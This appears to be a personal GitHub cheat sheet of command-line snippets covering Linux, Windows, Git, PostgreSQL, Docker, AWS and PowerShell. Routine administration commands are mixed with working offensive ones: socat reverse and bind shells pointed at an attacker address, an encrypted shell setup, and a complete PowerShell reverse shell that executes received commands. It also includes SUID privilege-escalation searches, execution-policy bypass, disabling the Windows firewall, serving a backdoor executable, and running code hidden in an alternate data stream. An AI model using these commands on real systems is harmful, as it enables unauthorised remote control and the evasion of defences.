-
Notifications
You must be signed in to change notification settings - Fork 39
Commands to resolve our problems or to facilitate our IT life :)
Table of Contents
Linux | Windows | Github | PostGreSQL | Docker | AWS | Kali | Python | Powershell
the next commands get the information about the SO
cat /proc/version
cat /etc/*release
uname -a
cat /etc/issue
get the current state of some variables of the system like CPU and RAM
top
it finds a file with its name
find / -name nombre
get the list of the ports used
netstat -lntu
print the memory ram used in our device
free -m
getting information about the memory and CPU
vmstat
and
top
print the list of users of a system
less /etc/passwd
find privileges
find / -perm -u=s -type f 2>/dev/null
The idea is to edit the next file when the program that you would like to use, in my case is "pico".
pico ~/.bashrc
you need to add on the final text the alias plus the command that you want to use
finally, execute the next line
. ~/.bashrc
The next command allows us to find the path of a specific file name
find -name "file name"
It turns off our own terminal echo, next it foregrounds the shell, thus completing the process.
stty raw -echo; fg
The idea is to configure the next "interfaces" with the parameters to out internet
sudo pico /etc/network/interfaces
Next, it restarts the interfaces in the SO
sudo /etc/init.d/networking restart
How do I verify if the interface are reachable
ip neigh show
Erase the information in a file text
truncate logfile --size 0
Generally commands... erase, move and copy files.
cp -a /source/. /dest/
rm -r [folder]/*
Looking to privileged things in order to scale them 🙈
find / -perm -4000 2> /dev/null | xargs ls
- Restart your password
The idea is to enter the recovery mode, just only use "shift" before the log screen. When you are there so let's use the next command
mount -n -o remount, rw /
Next, use the next command to restart the password according to the user.
passwd username_here
Take the DNS domain name and add it to /etc/hosts
echo IP spookysec.local >> /etc/hosts
Bind Shells
socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:"bash -li"
A fully stable Linux tty reverse shell.
socat TCP:<attacker-ip>:<attacker-port> EXEC:"bash -li",pty,stderr,sigint,setsid,sane
Socat encrypted shells
openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt
cat shell.key shell.crt > shell.pem
target or provider
socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 EXEC:cmd.exe,pipes
client
socat OPENSSL::,verify=0 -
## Windows
### socat
Bind Shells
`socat TCP-L:<PORT> EXEC:powershell.exe,pipes`
### How kill a process running in windows
You can use netstat, with that insert the next code in order to list the process sorted by port
`netstat -ano | findstr :8080`
with the selected process to kill, write the next line
`taskkill /PID typeID /F`
The next command allows us to print the name and SID of a SAM in a windows computer (only in a cmd with root privileges)
`wmic useraccount get name,sid`
Getting the powershell from bash
`powershell -ep bypass`
This displays the status of the firewall
`netsh firewall show opmode`
This turns off firewall state for all the profiles
`netsh advfirewall set allprofiles state off`
## GitHub
How know the list of repository associated to the .git.
`git remote -v`
Sometimes, it is necessary to save some local changes and update from the master repository in GitHub without to lose the job done, so, it is important first to commit the files that you need to save from the updating process.
`git commit [some files]`
next, update your local repository from the external changes.
`git pull origin master`
If you need to change the local email registered, write the next command.
`git config --global user.email "you@example.com"`
## PostGreSQL
list all databases
> \list or \l
list all tables in the current database
> dt
connect to a databse
> \connect database_name
execute a sql file in the posgrest environment
> psql -f thefile.sql targetdatabase
if you want to delete all the tables in the same squema, so write the next code:
> DROP SCHEMA public CASCADE;
To create a new schema:
> CREATE SCHEMA public;
if you want to know the postgresql version installed in your environment
> SELECT version();
see the view form
> \d view
***
## Docker
list the docker containers
> docker ps
stop one container with its ID
> docker stop container_id
get the docker container shell
>sudo docker exec -i -t docker-id /bin/bash
erase everything
>docker system prune
***
## AWS
the next command allows us to list our buckets
`aws s3 ls`
## Metasploit
This will determine if we're in a VM
`run post/windows/gather/checkvm`
The next command will check for various exploits which we can run within our session to elevate our privileges
`run post/multi/recon/local_exploit_suggester`
# Kali
These are the commands that allow us to share a file using an apache server
`mkdir /var/www/html/share`
`chmod -R 755 /var/www/html/share/ `
`chown -R www-data:www-data /var/www/html/share`
`service apache2 start`
`cp /root/Desktop/Backdoor.exe /var/www/html/share/`
# Python
`python -m http.server <port>`
The next is a way to create a netcat shell using Python
`python -c 'import pty;pty.spawn("/bin/bash")'`
# Powershell
`Get-FileHash -Algorithm MD5 file.txt`
Getting information about the Alternate Data Streams (ADS), where ADS allows files to contain more than one stream of data
`Get-Item -Path file.exe -Stream *`
Getting a reverse shell netcat
`powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<ip>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`
# others
`wmic process call create $(Resolve-Path file.exe:streamname)`